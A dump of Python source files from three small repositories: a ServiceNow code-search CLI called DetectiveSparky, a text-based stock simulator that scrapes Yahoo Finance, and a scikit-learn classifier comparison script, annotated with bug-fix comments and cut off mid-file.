            cur.execute("""UPDATE profile SET selected = 0 WHERE rowid != ?;""", (rowid,))
            conn.commit()
            click.echo("Profile selected.")
    except Exception as e:
        click.secho("Error selecting profile with rowid " + str(rowid) + ": " + str(e), fg="red")
    finally:
        # NOTE(review): conn is unbound here if sqlite3.connect itself raised.
        conn.close()
--- FILE SEPARATOR ---
from typing import List, Tuple
import click
import os, sys
import requests
from urllib.parse import quote
from ..connection.conn import setup_connection
def get_full_query_list(s: requests.Session, url: str, query_type: str) -> List[Tuple[str, str]]:
    """Fetch every (table, field) pair whose dictionary entry matches *query_type*
    ("xml", "html", or any other value for the script field types)."""
    type_queries = {
        "xml": "internal_type=xml^active=true",
        "html": "internal_type=html^ORinternal_type=html_script^ORinternal_type=html_template^active=true",
    }
    sd_query = type_queries.get(
        query_type,
        "internal_type=script_plain^ORinternal_type=script_server^ORinternal_type=script^active=true",
    )
    # on sys_dictionary, name is the table name and element is the field name
    resp = s.get(url + "/api/now/table/sys_dictionary", params={"sysparm_fields": "name,element", "sysparm_query": sd_query})
    if resp.status_code != 200:
        click.secho("Received status code " + str(resp.status_code) + " while retrieving list of " + query_type + " tables to query. Aborting.", fg="red")
        sys.exit()
    result = resp.json()['result']
    if result is None:
        return []
    return [(row['name'], row['element']) for row in result]
def get_list_from_file(filename: str) -> List[Tuple[str, str]]:
    """Parse *filename* as ``table,field`` lines into (table, field) tuples.

    Bug fix: the original validated the *stripped* values but appended the
    raw ones, leaking trailing newlines/whitespace into the result. Exits the
    process with an error message on malformed lines or unreadable files.
    """
    ret = []
    try:
        with open(filename, 'r') as file:
            for line in file.readlines():
                line_arr = line.split(',')
                if len(line_arr) != 2:
                    click.secho("File " + filename + " is not formatted correctly. Aborting query.", fg="red")
                    sys.exit()
                table = str(line_arr[0]).strip()
                field = str(line_arr[1]).strip()
                if table == "" or field == "":
                    click.secho("File " + filename + " is not formatted correctly. Aborting query.", fg="red")
                    sys.exit()
                ret.append((table, field))
    except Exception as e:
        click.secho("Could not open " + filename + ": " + str(e), fg="red")
        sys.exit()
    return ret
def generic_lookup(s: requests.Session, url: str, query_list: List[Tuple[str, str]], query_string: str):
    """Scan every (table, field) pair for records whose field contains *query_string*
    and print matching sys_ids.

    Bug fix: the error branch called ``resp.json.get('error')`` — ``.get`` on
    the bound method, not the parsed dict — which raised AttributeError; it now
    uses the parsed ``resp_json``, guarded against being unbound.
    """
    click.echo("[ Found " + click.style(str(len(query_list)), fg="blue") + " entries to scan ]")
    click.echo(click.style("{:<35} {:<25} {:<25} {:<50}".format('Sys ID', 'Table', 'Field', 'Name'), fg="bright_white", bold=True) )
    for item in query_list:
        table = str(item[0]).strip()
        field = str(item[1]).strip()
        resp = s.get(url + "/api/now/table/" + table, params={"sysparm_fields":"sys_id,name,u_name,sys_name", "sysparm_query": field + "LIKE" + quote(query_string)})
        if resp.status_code == 401 or resp.status_code == 500 or resp.status_code == 429:
            click.secho("Received status code " + str(resp.status_code) + " while retrieving data for table: " + table + ", field: " + field + ". Aborting.", fg="red")
            sys.exit()
        elif resp.status_code == 403: # sometimes we don't have access to query a table. Let's just skip these.
            continue
        resp_json = None
        try:
            resp_json = resp.json()
            if resp_json.get('result') != None:
                for i in resp_json['result']:
                    click.echo("{:<35} {:<25} {:<25} {:<50}".format(i.get('sys_id'), table, field, str(i.get('name') or i.get('sys_name') or i.get('u_name')).strip() ))
            elif resp_json.get('error') != None:
                click.secho("Error while querying: " + str(resp_json['error']), fg="yellow")
        except Exception: # This could hit if the user fat-fingered a custom query list.
            if resp_json is not None and resp_json.get('error') != None:
                click.secho("Error while querying: " + str(resp_json['error']), fg="yellow")
    click.secho("Finished.", fg="bright_white", bold=True)
def run_query(query_type: str, filename: str):
    """Prompt for a search string, then scan either the server's full field
    list for *query_type* or a custom (table, field) list from *filename*."""
    click.echo("Input query string for lookup")
    query_string = input(click.style(">> ", fg="bright_white", bold=True))
    s, url = setup_connection()
    if filename is None:
        targets = get_full_query_list(s, url, query_type)
    else:
        targets = get_list_from_file(filename)
    generic_lookup(s, url, targets, query_string)
def wf_script_lookup(s: requests.Session, url: str, query_list: List[Tuple[str, str, str]], query_string: str):
    """For each workflow activity, find sys_variable_value rows whose script
    variable contains *query_string* and print their sys_ids.

    Bug fix: the error branch called ``resp.json.get('error')`` — ``.get`` on
    the bound method, not the parsed dict — which raised AttributeError; it now
    uses the parsed ``resp_json``, guarded against being unbound.
    """
    click.echo("[ Found " + click.style(str(len(query_list)), fg="blue") + " entries to scan ]")
    click.echo(click.style("{:<35} {:<35} {:<35} {:<50}".format('WF Activity Sys ID', 'WF Version Sys ID', 'Sys Variable Value Sys ID', 'WF Activity Name'), fg="bright_white", bold=True) )
    for item in query_list:
        wf_act_sys_id = str(item[0]).strip()
        wf_activity_name = str(item[1]).strip()
        wf_version_sys_id = str(item[2]).strip()
        query = "document=wf_activity^document_key={}^variable.internal_type=script^ORvariable.internal_type=script_plain^valueLIKE{}".format(
            wf_act_sys_id,
            query_string.strip()
        )
        resp = s.get(url + "/api/now/table/sys_variable_value", params={"sysparm_fields":"sys_id", "sysparm_query": query})
        if resp.status_code == 401 or resp.status_code == 500 or resp.status_code == 429:
            click.secho("Received status code " + str(resp.status_code) + " while retrieving data for wf_activity: " + wf_act_sys_id + ", name: " + wf_activity_name + ". Aborting.", fg="red")
            sys.exit()
        elif resp.status_code == 403: # This should never happen...
            click.secho("403 while querying sys_variable_value", fg="yellow")
            continue
        resp_json = None
        try:
            resp_json = resp.json()
            if resp_json.get('result') != None:
                for i in resp_json['result']:
                    click.echo("{:<35} {:<35} {:<35} {:<50}".format( wf_act_sys_id, wf_version_sys_id, i.get('sys_id'), wf_activity_name ))
            elif resp_json.get('error') != None:
                click.secho("Error while querying: " + str(resp_json['error']), fg="yellow")
        except Exception: # This should also never happen, but just in case!
            if resp_json is not None and resp_json.get('error') != None:
                click.secho("Error while querying: " + str(resp_json['error']), fg="yellow")
    click.secho("Finished.", fg="bright_white", bold=True)
def wf_activity_lookup(s: requests.Session, url: str, wf_name: str) -> List[Tuple[str, str, str]]:
    """Grabs a list of all published wf_activity records that match the given
    workflow, as (sys_id, name, workflow_version sys_id) tuples. This builds the
    initial list of activities to query against, to be limited again by
    sys_variable_value's that reference a script variable.

    Bug fix: the error branch called ``resp.json.get('error')`` — ``.get`` on
    the bound method, not the parsed dict — which raised AttributeError.
    """
    query = "workflow_version.published=true^workflow_version.name=" + wf_name
    resp = s.get(url + "/api/now/table/wf_activity", params={"sysparm_fields": "sys_id,name,workflow_version", "sysparm_query": query})
    if resp.status_code != 200:
        click.secho("Received status code " + str(resp.status_code) + " while retrieving list of wf_activity records to query. Aborting.", fg="red")
        sys.exit()
    resp_json = resp.json()
    ret = []
    if resp_json.get('result') != None:
        for i in resp_json['result']:
            ret.append( (i.get('sys_id'), i.get('name'), i.get('workflow_version').get('value')) )
    elif resp_json.get('error') != None:
        click.secho("Error while querying: " + str(resp_json['error']), fg="yellow")
    return ret
def query_workflow():
    """Prompt for a workflow name and a script fragment, then scan that
    workflow's published activities for the fragment."""
    click.echo("Enter name of workflow to search")
    wf_name = input(click.style(">> ", fg="bright_white", bold=True)).strip()
    click.echo("Enter script fragment to search")
    fragment = input(click.style(">> ", fg="bright_white", bold=True)).strip()
    s, url = setup_connection()
    activities = wf_activity_lookup(s, url, wf_name)
    wf_script_lookup(s, url, activities, fragment)
--- FILE SEPARATOR ---
import click
from ..connection import conn
import sys
import re
def text_search():
    """Prompt for a table name, sys_id and search string, fetch that single
    record, and regex-search every one of its fields."""
    click.echo("Enter the table name and sys_id of a record to search")
    table_name = input(click.style("Table name >> ", fg="bright_white", bold=True)).strip()
    sys_id = input(click.style("sys_id >> ", fg="bright_white", bold=True)).strip()
    fragment = input(click.style("Search string >> ", fg="bright_white", bold=True)).strip()
    if table_name == "" or sys_id == "":
        click.secho("You must enter both a sys_id and table name to search", fg="red")
        sys.exit()
    if len(sys_id) != 32:  # ServiceNow sys_ids are always 32 characters
        click.secho("Invalid sys_id", fg="red")
        sys.exit()
    s, url = conn.setup_connection()
    resp = s.get(url + "/api/now/table/" + table_name, params={"sysparm_query": "sys_id=" + sys_id})
    body = resp.json()
    if resp.status_code != 200:
        try:
            err = body.get('error').get('message')
            click.secho("Search failed with status " + str(resp.status_code) + ' - ' + err, fg="red")
        # FIX: narrowed from a bare `except:` — only the missing/odd error
        # payload (AttributeError on .get of None) is expected here.
        except AttributeError:
            click.secho("Search failed with status " + str(resp.status_code), fg="red")
        finally:
            sys.exit()
    # BUG FIX: body.get('result') can be None when the key is absent, and the
    # original then crashed on len(None); treat that as "no results".
    res = body.get('result') or []
    if len(res) == 0:
        click.secho("No results found.", fg="bright_white", bold=True)
        sys.exit()
    obj = res[0] # at this point, we have a full record in the form of a dict
    found_results = False
    for prop in obj:
        search_results = search(fragment, obj[prop])
        if len(search_results) > 0:
            click.secho("\nIn column " + click.style(prop, fg="yellow") + ":")
            print_results(search_results)
            found_results = True
    if not found_results:
        click.secho("No results found", fg="yellow")
def search(fragment, value):
    """Takes a string value with multiple newlines and searches it against a fragment.
    Returns a list of found results with the term:
    (matched term, 1-based line number, full line).

    FIX: this text previously sat ABOVE the def as a bare module-level string,
    where it documented nothing; it is now the function's docstring.
    """
    value = str(value)
    ret = []
    # ServiceNow multi-line fields use CRLF separators.
    lines = value.split("\r\n")
    for inx, item in enumerate(lines):
        term = re.search(fragment, item)
        if term is not None:
            # Search term found, line count, full line
            ret.append((term.group(), inx + 1, item))
    return ret
def print_results(results):
    """Color prints the list of search results for each field.

    Each result is a (matched term, line number, full line) tuple as produced
    by search(). (FIX: docstring moved here from a bare module-level string
    that previously sat above the def.)
    """
    for item in results:
        line_num = str(item[1])
        line_found = color(str(item[2]).strip(), str(item[0]), "blue")
        click.secho(click.style("\tLine " + line_num + ": ", fg="bright_white", bold=True) + line_found)
def color(line: str, word: str, color: str):
    """Colors input word found in given line by CLI color.

    (FIX: docstring moved here from a bare module-level string above the def.)
    NOTE: the parameter `color` shadows the function's own name; kept for
    interface compatibility.
    """
    color_text = click.style(word, fg=color, bold=True)
    return line.replace(word, color_text)
--- FILE SEPARATOR ---
import keyring
import sqlite3
import click
from pathlib import Path
from typing import Tuple
import requests
import os, sys
def setup_connection() -> Tuple[requests.Session, str]:
    """Constructs the session using our profile and performs checks to ensure querying will go smoothly.

    Returns:
        (authenticated requests.Session, cleaned instance base URL).
    Exits the process on any profile, credential, or connectivity failure.
    """
    conn = None
    try:
        wd = Path(__file__).parent.parent.resolve()
        conn = sqlite3.connect(os.path.join(wd, 'sparky.db'))
        cur = conn.cursor()
        # Make sure we have a profile
        sel_resp = cur.execute("""SELECT rowid, profile_name, user, url FROM profile WHERE selected = 1;""").fetchone()
        if sel_resp is None:
            click.secho("No profile currently selected. Please use 'sparky profile select' to select a profile before querying.", fg="red")
            sys.exit()
    except Exception as e:
        click.secho("Error selecting profile during connection setup. Aborting with error: " + str(e), fg="red")
        sys.exit()
    finally:
        # BUG FIX: if sqlite3.connect() itself raised, `conn` was unbound and
        # the unconditional close() here raised NameError, masking the error.
        if conn is not None:
            conn.close()
    # Make sure we can get the password
    pw = keyring.get_password("sparky - " + str(sel_resp[0]) + " - " + sel_resp[1], sel_resp[2])
    if pw is None:
        click.secho("Could not find a password for the selected profile. Please try removing and adding the selected profile again.", fg="red")
        sys.exit()
    # clean up URL
    url = str(sel_resp[3]).strip().replace("http://", "https://")
    if url.find("https://") == -1:
        url = "https://" + url
    # Remove trailing slashes before appending the rest of the URL (common if copied from a browser)
    # BUG FIX: the original stripped only ONE trailing slash.
    url = url.rstrip('/')
    if not url.endswith("service-now.com"):
        url += ".service-now.com"
    click.echo("Profile " + click.style(sel_resp[1], fg="green") + " is selected. (" + url + ")")
    # Do pre-flight check for access to instance and ability to query admin tables
    s = requests.Session()
    s.auth = (str(sel_resp[2]), pw)
    resp = s.get(url + '/api/now/table/sys_dictionary', params = {'sysparm_fields': 'sys_id', 'sysparm_limit': '1'}, headers={'Content-Type': 'application/json'})
    if resp.status_code == 401:
        # FIX: corrected "authentcate" typo in the user-facing error message.
        click.secho("User credentials for the selected profile failed to authenticate.", fg="red")
        sys.exit()
    elif resp.status_code == 403:
        click.secho("The profile selected is not authorized to query admin tables. Please ensure your ServiceNow user has admin access.", fg="red")
        sys.exit()
    elif 200 <= resp.status_code <= 299:
        return s, url
    else:
        click.secho("Abnormal status code for instance (" + str(resp.status_code) + "), aborting.", fg="red")
        sys.exit()
--- FILE SEPARATOR ---
import click
# Shared click settings: make -h work everywhere alongside --help.
CONTEXT_SETTINGS = {"help_option_names": ["-h", "--help"]}
@click.group(
    help="A tool to help find code in any ServiceNow instance.",
    context_settings=CONTEXT_SETTINGS,
)
def cli() -> None:
    """Root command group; ensures the profile store exists before any subcommand."""
    from .cmd_funcs.profile import startup_profile
    startup_profile()
@cli.command("version", help="Shows the current version.")
def version_cmd() -> None:
    """Print the name/version/author banner."""
    name = click.style("DetectiveSparky", fg="green")
    version = click.style("v1.1.0", fg="bright_white", bold=True)
    author = click.style("Written by Blake Duckworth", fg="blue", dim=True)
    click.echo("{} {}\n\n{}".format(name, version, author))
### PROFILE COMMANDS
@click.group("profile", help="Contains commands for managing SNow profiles. Use the command 'sparky profile --help' for additional options.")
def profile_cmd() -> None:
    """Container group; the subcommands below do the actual work."""
@profile_cmd.command("new", help="Adds a new profile to your list of available selections. When adding a profile, please make sure that the associated account contains credentials with admin access so that script/html/xml fields can be searched against.")
def profile_add():
    """Interactively create and store a new profile."""
    from .cmd_funcs.profile import new_profile
    new_profile()  # FIX: removed stray trailing semicolon (un-Pythonic)
@profile_cmd.command("list", help="Displays a list of existing profiles that have been added to sparky.")
def profile_list():
    """Print every stored profile."""
    from .cmd_funcs.profile import list_profiles as _list
    _list()
@profile_cmd.command("delete", help="Removes an existing profile.")
def profile_del():
    """Interactively delete a stored profile."""
    from .cmd_funcs.profile import delete_profile as _delete
    _delete()
@profile_cmd.command("select", help="Selects the primary profile to be used for all future queries.")
def profile_select():
    """Mark one stored profile as the active one."""
    from .cmd_funcs.profile import select_profile as _select
    _select()
@profile_cmd.command("edit", help="Edits an existing profile.")
def profile_edit():
    """Interactively edit a stored profile."""
    from .cmd_funcs.profile import edit_profile as _edit
    _edit()
### QUERY COMMANDS
@cli.group("query", help="All commands for querying using the selected profile. Use the command 'sparky query -h' for additional options. Please note that these commands will not work if you have not both created and selected a profile.")
def query_cmd() -> None:
    """Container group for the query subcommands."""
@query_cmd.command("script", help="Queries against script fields using the selected profile.")
@click.option(
    # FIX: flag order was ("--filename", "-f") here but ("-f", "--filename")
    # on the sibling html/xml commands; normalized for consistency.
    "-f",
    "--filename",
    help=(
        "Instead of performing the default search against all script records, specify a file by path "
        "that lists the tables and corresponding field names to perform the query against."
        "\n\nExample file format: sys_script_include,script"
    ),
    type=str,
    default=None,
    required=False,
)
def query_script(filename: str):
    """Run the script-field query, optionally limited to a table/field list file."""
    from .cmd_funcs.query import run_query
    run_query("script", filename)
@query_cmd.command("html", help="Queries against HTML fields using the selected profile.")
@click.option(
    "-f",
    "--filename",
    help=(
        "Instead of performing the default search against all HTML records, specify a file by path "
        "that lists the tables and corresponding field names to perform the query against."
        "\n\nExample file format: sp_widget,template"
    ),
    required=False,
    default=None,
    type=str,
)
def query_html(filename: str):
    """Run the HTML-field query, optionally limited to a table/field list file."""
    from .cmd_funcs.query import run_query as _run
    _run("html", filename)
@query_cmd.command("xml", help="Queries against XML fields using the selected profile.")
@click.option(
    "-f",
    "--filename",
    help=(
        "Instead of performing the default search against all XML records, specify a file by path "
        "that lists the tables and corresponding field names to perform the query against."
        "\n\nExample file format: sys_ui_page,html"
    ),
    required=False,
    default=None,
    type=str,
)
def query_xml(filename: str):
    """Run the XML-field query, optionally limited to a table/field list file."""
    from .cmd_funcs.query import run_query as _run
    _run("xml", filename)
@query_cmd.command("workflow", help="Performs queries against scripts in workflows.")
def query_wf():
    """Run the interactive workflow-script search."""
    from .cmd_funcs.query import query_workflow as _wf_search
    _wf_search()
### TEXT SEARCH
@cli.command("textsearch", help="Text searches a single record in ServiceNow. Shows all case-sensitive matching instances.")
def txt_cmd() -> None:
    """Search one record's fields for a text fragment."""
    from .cmd_funcs.single_search import text_search as _search
    _search()
# profile_cmd is a stand-alone @click.group, so it must be attached explicitly.
# FIX: version_cmd, query_cmd and txt_cmd were registered twice — their
# @cli.command / @cli.group decorators already attached them to `cli`, so the
# redundant add_command calls were dropped (the resulting CLI is identical).
cli.add_command(profile_cmd)
|
[
"/src/sparky/cmd_funcs/profile.py",
"/src/sparky/cmd_funcs/query.py",
"/src/sparky/cmd_funcs/single_search.py",
"/src/sparky/connection/conn.py",
"/src/sparky/main.py"
] |
00MB/stock-simulation
|
# Visual separator printed between command outputs (used by stock.py's REPL).
line = "\n" + "_" * 50 + "\n"
# Leftover dispatch-table prototype; the live table is built in stock.py.
#globals = {"start" : start, "quit" : quit, "help" : help, "about" : about}
--- FILE SEPARATOR ---
#Python stock market simulator
from globals import *
from bs4 import BeautifulSoup
import requests
def set():
    """Load funds and portfolio from data.txt into the module globals.

    data.txt format:
        line 1: funds (float)
        line 2: comma-separated holdings, each "SYMBOL-price-amount"

    NOTE: the name shadows the builtin set(); kept because the rest of the
    script calls it by this name.
    """
    global portfolio
    global funds
    # `with` guarantees the handle closes even if parsing raises.
    with open("data.txt", "r") as fileread:
        funds = float(fileread.readline().strip())
        entries = fileread.readline().strip().split(",")
    # BUG FIX: the original parsed every entry (IndexError on empty strings
    # from stray commas) and then deleted empty entries from the list while
    # index-iterating it, which skips elements and can raise IndexError.
    # Filter empties up front instead of mutating during iteration.
    portfolio = []
    for entry in entries:
        if entry == "":
            continue
        parts = entry.split("-")
        parts[1] = float(parts[1])
        parts[2] = int(parts[2])
        portfolio.append(parts)
# Load saved state at import time; requires data.txt to exist beside the script.
set()
# Welcome banner; `line` is the separator defined in globals.py.
print(f"""\nThis is a real time investment simulation. \n
If you are new or want to reset the simulation, type !START. \n
To see a list of commands, type !COMMANDS {line}""")
#FUNCTIONS
def about():
    """Print background information about the simulator and its author."""
    print("""
    This stock simulator is a weekend project created by github user 00MB
    on 20/7/20. The simulator works by scraping live figures from yahoo finance, and saving
    the user into a text file. Feel free to play around and break it.
    """)
def buy():
    """Prompt for a stock symbol and quantity, scrape the live price from
    Yahoo Finance, and add the purchase to the portfolio if funds allow."""
    global funds
    global portfolio
    symbol = input("Enter stock symbol: ")
    url = "https://uk.finance.yahoo.com/quote/" + symbol
    headers = {"User-Agent" : "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) snap Chromium/83.0.4103.61 Chrome/83.0.4103.61 Safari/537.36"}
    request = requests.get(url, headers=headers)
    soup = BeautifulSoup(request.content, 'html.parser')
    try:
        # Yahoo renders the quote in a span with these (fragile) utility classes.
        price = soup.find("span", class_="Trsdu(0.3s) Fw(b) Fz(36px) Mb(-4px) D(ib)").get_text()
        price = float(price.replace(',',''))
    # FIX: narrowed from a bare `except:` — AttributeError when the span is
    # missing (bad symbol / layout change), ValueError on a non-numeric price.
    except (AttributeError, ValueError):
        print("ERROR - invalid stock symbol")
        return
    print(f"Stock price: ${price}")
    print(f"funds available: ${funds}")
    try:
        amount = int(input("Please insert stock amount (To cancel, insert 0): "))
    except ValueError:
        print("\nERROR - incorrect data type")
        return
    if amount < 0 or amount > 1000:  # 1000 is an arbitrary per-order cap
        print("ERROR - unavailable amount")
        return
    elif amount == 0:
        return
    totalsum = amount * price
    if totalsum > funds:
        print("Costs exceeds available funds")
        return
    else:
        portfolio.append([symbol,price,amount])
        funds = round((funds - totalsum),2)
        print("Successfully purchased stock")
def sell():
    """Prompt for a held symbol and amount, confirm at the live Yahoo Finance
    price, and credit the proceeds to funds."""
    global funds
    global portfolio
    # FIX: input() moved out of the try so `symbol` is always bound when the
    # except's f-string references it; except narrowed from bare `except:` to
    # ValueError (raised by .index on a miss).
    symbol = input("Enter stock symbol to sell: ")
    try:
        names = [x[0] for x in portfolio]
        index = names.index(symbol)
        print(f"index:{index}")
    except ValueError:
        print(f"ERROR - no {symbol} stock is owned")
        return
    print(f"Amount owned: {portfolio[index][2]}")
    try:
        amount = int(input("Input amount of stocks to sell: "))
    except ValueError:
        print("\nERROR - incorrect data type")
        return
    # BUG FIX: negative amounts were accepted — a negative "sale" would
    # silently increase the holding while draining funds.
    if amount < 0 or amount > portfolio[index][2]:
        print("ERROR - invalid input")
        return
    url = "https://uk.finance.yahoo.com/quote/" + symbol
    headers = {"User-Agent" : "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) snap Chromium/83.0.4103.61 Chrome/83.0.4103.61 Safari/537.36"}
    request = requests.get(url, headers=headers)
    soup = BeautifulSoup(request.content, 'html.parser')
    # FIX: guard the scrape — soup.find() returns None when the quote span is
    # missing, which previously crashed with AttributeError.
    try:
        price = soup.find("span", class_="Trsdu(0.3s) Fw(b) Fz(36px) Mb(-4px) D(ib)").get_text()
        price = float(price.replace(',',''))
    except (AttributeError, ValueError):
        print("ERROR - invalid stock symbol")
        return
    print(f"Stock bought at: ${portfolio[index][1]}")
    print(f"Current stock price: ${price}")
    print(f"Profit/loss: ${amount * (float(price) - float(portfolio[index][1]))}\n")
    sold = input(f"Would you like to sell {symbol} stock at ${price} (type Y or N): ")
    if sold.lower() == "n":
        print("Request cancelled")
        return
    elif sold.lower() == "y":
        pass
    else:
        print("ERROR - invalid input")
        return
    amountnew = portfolio[index][2] - amount
    funds = round((funds + (float(price) * amount)),2)
    if amountnew == 0:
        del portfolio[index]
    else:
        portfolio[index][2] = amountnew
    print(f"Successfully sold {symbol} stock at ${price}, your funds available are ${funds}")
    if funds < 0:
        print("\nFunds available have reached less than 0, please type !START to reset")
def fund():
    """Print the cash balance currently available (module global `funds`)."""
    print(f"Current funds available: ${funds}")
def stocks():
    """List every holding: symbol, purchase price, and quantity."""
    print("Current stocks:")
    for holding in portfolio:
        print(f"Symbol: {holding[0]}, Bought at: ${holding[1]}, Amount: {holding[2]}")
def start():
    """Reset the simulation: prompt for a starting balance, clear holdings."""
    global funds
    global portfolio
    try:
        funds = float(input("Enter your starting amount: $"))
    except ValueError:
        print("\nERROR - incorrect data type")
        return
    print("\nSuccessfully set funds")
    portfolio = []
def quit():
    """Persist funds and portfolio to data.txt, then terminate the process.

    NOTE: shadows the builtin quit(); kept for the command-table interface.
    """
    # BUG FIX: the original aliased (not copied) the global portfolio and
    # destructively converted every holding to strings before exiting;
    # serialize into a separate string so the in-memory state is untouched.
    serialized = ",".join(
        "-".join([entry[0], str(entry[1]), str(entry[2])]) for entry in portfolio
    )
    with open("data.txt", "w") as filewrite:  # `with` guarantees flush/close
        filewrite.write(str(funds) + "\n")
        filewrite.write(serialized)
    exit()
def save():
    """Persist funds and portfolio to data.txt without quitting, then reload.

    BUG FIX: the original aliased (not copied) the global portfolio and
    destructively turned its holdings into strings, relying on the trailing
    set() reload to repair the damage; serialization now uses a separate
    string and set() is just a consistency refresh.
    """
    serialized = ",".join(
        "-".join([entry[0], str(entry[1]), str(entry[2])]) for entry in portfolio
    )
    with open("data.txt", "w") as filewrite:
        filewrite.write(str(funds))
        filewrite.write("\n")
        filewrite.write(serialized)
    set()
def commands():
    """Print the command reference. (The stray '#' marks in the text are
    leftovers present in the original help text.)"""
    print("""
    !ABOUT - displays information about the program and creator\n
    !BUY - displays menu to buy stocks\n #
    !FUND - displays the current funds available\n #
    !PRICE {stock symbol} - displays live price of stock\n
    !QUIT - stops the process and closes the application\n
    !SAVE - saves current stocks and available funds\n
    !SELL - displays menu to sell your current stocks\n #
    !START - clears data and prompts user to enter starting funds amount\n #
    !STOCKS - displays the currently owned stocks\n #
    """)
# Dispatch table mapping user-typed commands to their handlers.
# NOTE(review): the name shadows the builtin globals(); a rename would be safer.
globals = {'!BUY' : buy, '!START' : start, '!QUIT' : quit, '!COMMANDS' : commands, '!STOCKS' : stocks, '!FUND' : fund, '!SELL' : sell, '!SAVE' : save, '!ABOUT' : about}
# REPL: read a command, dispatch it, print a separator; loops until !QUIT exits.
while True:
    inp = input("Enter command: ")
    if inp in globals:
        print("\n")
        globals[inp]()
        print(line)
    else:
        print("ERROR - invalid command")
|
[
"/globals.py",
"/stock.py"
] |
00Starlord00/Algo-Recomender
|
import random
import supervised
import unsupervised
def data_shuffle(dataSet): #Shuffle the dataSet.
    """Shuffle the data rows of a CSV, keeping the header line first.

    The shuffled copy is written to "Shuffled_data.csv".
    """
    with open(dataSet,"r") as f1, open("Shuffled_data.csv","w") as f2:
        lines = f1.readlines()
        # BUG FIX: the original shuffled header+rows together and then skipped
        # every line equal to the header, which also silently dropped any DATA
        # row whose text happened to match the header. Shuffle only the rows.
        header, rows = lines[0], lines[1:]
        random.shuffle(rows)
        f2.write(header)
        f2.writelines(rows)
def classifier(dataSet, shuffling = 0, yCol = -1):
    """Run all supervised classifiers on the dataset and report the best.

    Args:
        dataSet: path to a CSV with the label in column yCol.
        shuffling: 1 to shuffle rows first via data_shuffle, 0 otherwise.
        yCol: index of the label column (default: last).

    Returns:
        (algorithmName, highAccuracy, savedModel) from supervised.classifier.
    """
    if shuffling == 1:
        data_shuffle(dataSet)
        # BUG FIX: the recursive call's result was discarded (the shuffled
        # branch returned None) and yCol was dropped; return it and pass yCol.
        return classifier("Shuffled_data.csv", 0, yCol)
    else:
        print("Computing...")
        algorithmName, highAccuracy, savedModel = supervised.classifier(dataSet,yCol)
        return algorithmName, highAccuracy, savedModel
def cluster(dataSet, shuffing = 0, yCol = -1):
    """Run the clustering algorithms on the dataset and report the best.

    NOTE: the misspelled parameter name `shuffing` is kept for interface
    compatibility with existing callers.

    Returns:
        (algorithmName, highAccuracy, savedModel) from unsupervised.cluster.
    """
    if shuffing == 1:
        data_shuffle(dataSet)
        # BUG FIX: the recursive call's result was discarded (returned None).
        return cluster("Shuffled_data.csv", 0, yCol)
    else:
        print("Computing...")
        # BUG FIX: `dataset` was an undefined name (NameError); also forward yCol.
        algorithmName, highAccuracy, savedModel = unsupervised.cluster(dataSet, yCol)
        return algorithmName, highAccuracy, savedModel
if __name__ =='__main__':
    # NOTE(review): dataSet, shuffing and shuffling are never defined at module
    # scope, so running this file directly raises NameError — these lines only
    # document intended usage. TODO: parse real arguments (e.g. argparse).
    classifier(dataSet,shuffing,yCol)
    cluster(dataSet,shuffling,yCol)
--- FILE SEPARATOR ---
import sklearn as sk
import pandas as pd
import pickle
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import GaussianNB
from sklearn.linear_model import SGDClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.svm import SVC
from sklearn.metrics import accuracy_score
def data_split(dataSet, yCol = -1, spliSize = 0.33): #Splitting the dataset for the model.
    """Split a CSV into train/test features and labels.

    '?' cells are replaced with the -9999 sentinel before splitting.
    Returns xTrain, xTest, yTrain, yTest (train_test_split order).
    """
    frame = pd.read_csv(dataSet, header=0)
    frame.replace('?', -9999, inplace=True)  # sentinel for unknown values
    labels = frame.iloc[:, yCol]
    features = frame.iloc[:, :yCol]
    return train_test_split(features, labels, test_size=spliSize)
def classifier(dataSet, yCol = -1):
    """Train all seven classifiers interactively and pick the most accurate.

    Returns:
        (algorithmName, highAccuracy, savedModel): the winner's display name,
        its accuracy in percent, and the pickled fitted model.
    """
    algoDict = {0:"Logistic Regression", 1:"Naive Bayes", 2:"Stochastic Gradient Descent", 3:"K Nearest Neighbors", 4:"Decision Tree", 5:"Random Forest", 6:"SVM"} #Dictionary of the algorithms used.
    spliSize = float(input("Enter the size of the testing dataset : ")) #User input for the testing size.
    xTrain, xTest, yTrain, yTest = data_split(dataSet, yCol, spliSize)
    # Trainers are run in dictionary-key order so indexes line up with algoDict.
    trainers = (logistic_regression, naive_bayes, stochastic_gradient_descent,
                k_nearest_neighbors, decision_tree, random_forest, svm)
    results = [fit(xTrain, yTrain, xTest, yTest) for fit in trainers]
    accuracyList = [outcome[0] for outcome in results]
    highAccuracy = max(accuracyList)  # highest accuracy wins
    best = accuracyList.index(highAccuracy)
    return algoDict[best], highAccuracy, results[best][1]
'''
Main Computation.
'''
def logistic_regression(xTrain, yTrain, xTest, yTest):
    """Fit logistic regression; return [accuracy %, pickled fitted model]."""
    clf = LogisticRegression()
    clf.fit(xTrain, yTrain)
    score_pct = accuracy_score(yTest, clf.predict(xTest)) * 100
    return [score_pct, pickle.dumps(clf)]
def naive_bayes(xTrain, yTrain, xTest, yTest):
    """Fit a Gaussian naive-Bayes classifier; return [accuracy %, pickled model]."""
    clf = GaussianNB()
    clf.fit(xTrain, yTrain)
    score_pct = accuracy_score(yTest, clf.predict(xTest)) * 100
    return [score_pct, pickle.dumps(clf)]
def stochastic_gradient_descent(xTrain, yTrain, xTest, yTest):
    """Fit an SGD classifier (modified Huber loss); return [accuracy %, pickled model]."""
    clf = SGDClassifier(loss = 'modified_huber', shuffle = True, random_state = 101)
    clf.fit(xTrain, yTrain)
    score_pct = accuracy_score(yTest, clf.predict(xTest)) * 100
    return [score_pct, pickle.dumps(clf)]
def k_nearest_neighbors(xTrain, yTrain, xTest, yTest):
    """Fit a k-NN classifier (k prompted from the user); return [accuracy %, pickled model]."""
    k = int(input("Enter the numbers of classes for k-neighbors classifier.:"))
    clf = KNeighborsClassifier(n_neighbors=k)
    clf.fit(xTrain, yTrain)
    score_pct = accuracy_score(yTest, clf.predict(xTest)) * 100
    return [score_pct, pickle.dumps(clf)]
def decision_tree(xTrain, yTrain, xTest, yTest):
